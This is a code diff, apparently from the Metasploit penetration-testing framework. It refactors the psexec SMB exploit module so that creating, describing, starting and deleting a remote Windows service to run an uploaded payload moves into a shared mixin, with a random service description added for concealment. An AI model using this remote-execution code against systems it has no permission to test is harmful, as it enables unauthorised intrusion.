Adapt to new psexec mixin (first try :D)

Author: agix

lib/msf/core/exploit/smb/psexec.rb

@@ -52,7 +52,7 @@ def smb_read_file(smbshare, host, file)
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true)
+  def psexec(command, service_description,disconnect=true)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
@@ -72,6 +72,7 @@ def psexec(command, disconnect=true)
     end
     servicename = Rex::Text.rand_text_alpha(11)
     displayname = Rex::Text.rand_text_alpha(16)
+    servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
     svc_handle = nil
     svc_status = nil
     stubdata =
@@ -100,6 +101,23 @@ def psexec(command, disconnect=true)
       return false
     end
 
+    vprint_status("#{peer} - Changing service description...")
+    stubdata =
+      svc_handle +
+      NDR.long(1) +
+      NDR.long(1) +
+      NDR.long(0x0200) +
+      NDR.long(0x04000200) +
+      NDR.wstring(servicedescription)
+    begin
+      response = dcerpc.call(0x25, stubdata)
+      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+      end
+    rescue ::Exception => e
+      print_error("#{peer} - Error changins service description : #{e}")
+      return false
+    end
+
     vprint_status("#{peer} - Starting the service...")
     stubdata = svc_handle + NDR.long(0) + NDR.long(0)
     begin

modules/exploits/windows/smb/psexec.rb

@@ -153,7 +153,7 @@ def exploit
       simple.disconnect("ADMIN$")
     else
       servicename = rand_text_alpha(8)
-      servicedescription = datastore['SERVICE_DESCRIPTION']
+      servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")
@@ -199,129 +199,7 @@ def exploit
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, false)
-
-      print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
-      stubdata =
-        scm_handle +
-        NDR.wstring(servicename) +
-        NDR.uwstring(displayname) +
-
-        NDR.long(0x0F01FF) + # Access: MAX
-        NDR.long(0x00000110) + # Type: Interactive, Own process
-        NDR.long(0x00000003) + # Start: Demand
-        NDR.long(0x00000000) + # Errors: Ignore
-        NDR.wstring( file_location  ) + # Binary Path
-        NDR.long(0) + # LoadOrderGroup
-        NDR.long(0) + # Dependencies
-        NDR.long(0) + # Service Start
-        NDR.long(0) + # Password
-        NDR.long(0) + # Password
-        NDR.long(0) + # Password
-        NDR.long(0)  # Password
-      begin
-        response = dcerpc.call(0x0c, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
-          svc_status = dcerpc.last_response.stub_data[24,4]
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      ##
-      # CloseHandle()
-      ##
-      print_status("Closing service handle...")
-      begin
-        response = dcerpc.call(0x0, svc_handle)
-      rescue ::Exception
-      end
-
-      ##
-      # OpenServiceW
-      ##
-      print_status("Opening service...")
-      begin
-        stubdata =
-          scm_handle +
-          NDR.wstring(servicename) +
-          NDR.long(0xF01FF)
-
-        response = dcerpc.call(0x10, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      if servicedescription
-        ##
-        # ChangeServiceConfig2W()
-        ##
-        print_status("Change the service description (#{servicedescription})...")
-        begin
-          stubdata =
-            svc_handle +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(0x0200) +
-            NDR.long(0x04000200) +
-            NDR.wstring(servicedescription)
-
-          response = dcerpc.call(0x25, stubdata)
-          if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          end
-        rescue ::Exception => e
-          print_error("Error: #{e}")
-        end
-      end
-
-      ##
-      # StartService()
-      ##
-      print_status("Starting the service...")
-      stubdata =
-        svc_handle +
-        NDR.long(0) +
-        NDR.long(0)
-      begin
-        response = dcerpc.call(0x13, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      ##
-      # DeleteService()
-      ##
-      print_status("Removing the service...")
-      stubdata =
-        svc_handle
-      begin
-        response = dcerpc.call(0x02, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-      end
-
-      ##
-      # CloseHandle()
-      ##
-      print_status("Closing service handle...")
-      begin
-        response = dcerpc.call(0x0, svc_handle)
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-      end
-
-      begin
+      psexec(file_location, servicedescription, false)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)